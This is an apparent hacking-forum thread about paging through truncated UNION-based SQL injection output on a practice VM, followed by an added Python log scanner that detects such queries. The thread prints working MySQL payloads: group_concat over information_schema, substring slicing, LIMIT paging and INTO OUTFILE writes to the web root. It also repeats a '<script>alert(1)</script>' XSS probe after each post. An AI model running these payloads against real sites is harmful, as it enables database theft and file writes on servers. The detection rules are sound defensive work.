Author | SQL injection in limited space
Thorin, Member
Posts: 12 Location: India
Joined: 09.06.14 Rank: Uber Elite
This might seem like a noob question. I am currently trying SQL injection on a VM. This is what I am trying:
Code:
union select group_concat(table_name) from information_schema.tables#
And the injection works. But the page that is returned is an XML file and each tag has a size limitation, so I can see only half of the results.
Code:
<title>Bla Forum - Topic: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,columns_priv,db,func,help_category,help_keyword,help_relation,help_topic,host,proc,procs_priv,tables_pri </title>
Is there a way to print the second half of the results? The table that I need to see contains the word "user". If I'm too ambiguous, I want to do something along the lines of:
1. Arrange the rows of the result and then group_concat it
2. Slice the result (as in string[10:])
3. Select all the rows after tables_priv
_____________________________________________________________
What I already tried:
Code:
union select group_concat(table_name) from information_schema.tables where table_name regexp 'user'#
Nothing is printed out. But this query works when I directly try it in the VM's mysql (after omitting the 'union' and the '#').
Code:
union select group_concat(table_name) from information_schema.tables where table_name like 'user'#
Didn't work in either the web application or directly in the VM's mysql.
PS. I know sqlmap will do the job for me, but I want to try things manually.
<script>alert(1)</script>
Author | RE: SQL injection in limited space
skeet, Member
Posts: 11 Location:
Joined: 26.01.16 Rank: HBH Guru
If you know the current working directory, or a directory you have access to, try to put the output into a text file with
INTO OUTFILE '/path/where/you/can/read/write/query.txt'
Author | RE: SQL injection in limited space
Thorin, Member
Posts: 12 Location: India
Joined: 09.06.14 Rank: Uber Elite
I don't have access to the file system (from the hacker's perspective .. meaning no LFI vulnerabilities) ... Anyways, I just solved the question. I used the following payload:
Code:
union select substring(group_concat(table_name),341,341) from information_schema.tables#;
<script>alert(1)</script>
Author | RE: SQL injection in limited space
Thorin, Member
Posts: 12 Location: India
Joined: 09.06.14 Rank: Uber Elite
skeet wrote:
If you know the current working directory, or a directory you have access to, try to put the output into a text file with
INTO OUTFILE '/path/where/you/can/read/write/query.txt'
Taking into consideration what you're saying: since I don't have an LFI or directory traversal vulnerability, I can use SQL injection to read a particular file on the file system. So if I dump the output of the initial injection into a file and then read it using another SQL injection, won't that lead me to the same place (size limitations)? Won't work in this situation, but certainly something to try on another machine.
<script>alert(1)</script>
Author | RE: SQL injection in limited space
skeet, Member
Posts: 11 Location:
Joined: 26.01.16 Rank: HBH Guru
Thorin wrote:
skeet wrote:
If you know the current working directory, or a directory you have access to, try to put the output into a text file with
INTO OUTFILE '/path/where/you/can/read/write/query.txt'
Taking into consideration what you're saying: since I don't have an LFI or directory traversal vulnerability, I can use SQL injection to read a particular file on the file system. So if I dump the output of the initial injection into a file and then read it using another SQL injection, won't that lead me to the same place (size limitations)? Won't work in this situation, but certainly something to try on another machine.
I was thinking more along the lines of executing the query with INTO OUTFILE '/var/www/html/results.txt' and then just checking with your browser at http://www.whatever.com/results.txt. Either way, glad you solved your problem.
Author | RE: SQL injection in limited space
Huitzilopochtli, Member
Posts: 1624 Location:
Joined: 19.02.13 Rank: God
If there was no INTO OUTFILE available, I'd just have used LIMIT.
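The thread above is a compact catalogue of what a UNION-based extraction looks like from the server side: a UNION SELECT over information_schema, substring() over group_concat() to page through a response that truncates output, LIMIT paging, and INTO OUTFILE to write results somewhere reachable. The following is an added example, not code from the thread or from any of its posters: a small Python scanner that applies those indicators to web access-log lines so a defender can spot this traffic. The log lines are constructed for the example, and the rule names, weights and the alert threshold are assumptions of mine, not a standard.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the thread). Lines 2-4
# carry the kind of payloads discussed in the thread; line 5 is a benign
# request that happens to contain the word "union" and must not be flagged.
SAMPLE_LOGS = [
    '10.0.0.5 - - [09/Jun/2014:10:00:01 +0000] "GET /forum.php?topic=12 HTTP/1.1" 200 512',
    '10.0.0.9 - - [09/Jun/2014:10:00:07 +0000] "GET /forum.php?topic=-1%20union%20select%20'
    'group_concat(table_name)%20from%20information_schema.tables%23 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [09/Jun/2014:10:01:13 +0000] "GET /forum.php?topic=-1%20union%20select%20'
    'substring(group_concat(table_name),341,341)%20from%20information_schema.tables%23 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [09/Jun/2014:10:02:20 +0000] "GET /forum.php?topic=-1%20union%20select%20table_name%20'
    'from%20information_schema.tables%20limit%2030,1%20into%20outfile%20%27/tmp/results.txt%27%23 HTTP/1.1" 500 128',
    '10.0.0.7 - - [09/Jun/2014:10:03:00 +0000] "GET /forum.php?topic=7&view=union HTTP/1.1" 200 400',
]

# Indicator name, regex applied to the normalized request, and a weight.
# Names and weights are assumptions for this example, not a published ruleset.
RULES = [
    ("union_select", r"\bunion\b(?:\s+all)?\s+select\b", 3),
    ("information_schema", r"\binformation_schema\b", 3),
    ("group_concat_slice", r"\b(?:substring|substr|mid)\s*\(\s*group_concat\s*\(", 2),
    ("into_outfile", r"\binto\s+(?:out|dump)file\b", 4),
    ("limit_paging", r"\blimit\s+\d+\s*,\s*\d+", 1),
]
COMPILED = [(name, re.compile(pattern), weight) for name, pattern, weight in RULES]
WEIGHTS = {name: weight for name, _, weight in RULES}

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|HEAD)\s+(\S+)\s+HTTP/')


def extract_request(line):
    """Return the request target from a combined-format log line, or None."""
    m = REQUEST_RE.search(line)
    return m.group(1) if m else None


def normalize(raw):
    """URL-decode twice (catches double encoding), treat the MySQL /**/ comment
    as whitespace, collapse whitespace runs and lowercase, so the rules see
    plain SQL rather than its encoded form."""
    decoded = unquote_plus(unquote_plus(raw))
    decoded = decoded.replace("/**/", " ")
    return re.sub(r"\s+", " ", decoded).lower()


def classify(text):
    """Names of all indicators that match the normalized text, in RULES order."""
    return [name for name, rx, _ in COMPILED if rx.search(text)]


def scan_logs(lines, threshold=3):
    """Return one finding per log line whose summed indicator weights reach
    the threshold; a lone weak indicator such as LIMIT paging is not enough."""
    findings = []
    for line in lines:
        request = extract_request(line)
        if request is None:
            continue
        hits = classify(normalize(request))
        score = sum(WEIGHTS[name] for name in hits)
        if score >= threshold:
            findings.append({
                "ip": line.split(" ", 1)[0],
                "request": request,
                "indicators": hits,
                "score": score,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_logs(SAMPLE_LOGS):
        print(finding["ip"], finding["score"], finding["indicators"])
```

The weighting matters more than any single regex: `LIMIT n,m` appears in legitimate pagination, so on its own it scores below the threshold, while a UNION SELECT touching information_schema is flagged immediately, and the INTO OUTFILE indicator carries the highest weight because a successful write to a web-served directory turns data extraction into a persistent artefact on the host. Normalizing (URL-decoding twice, folding `/**/`, lowercasing) is what keeps the rules from being sidestepped by trivial encoding differences in the same query.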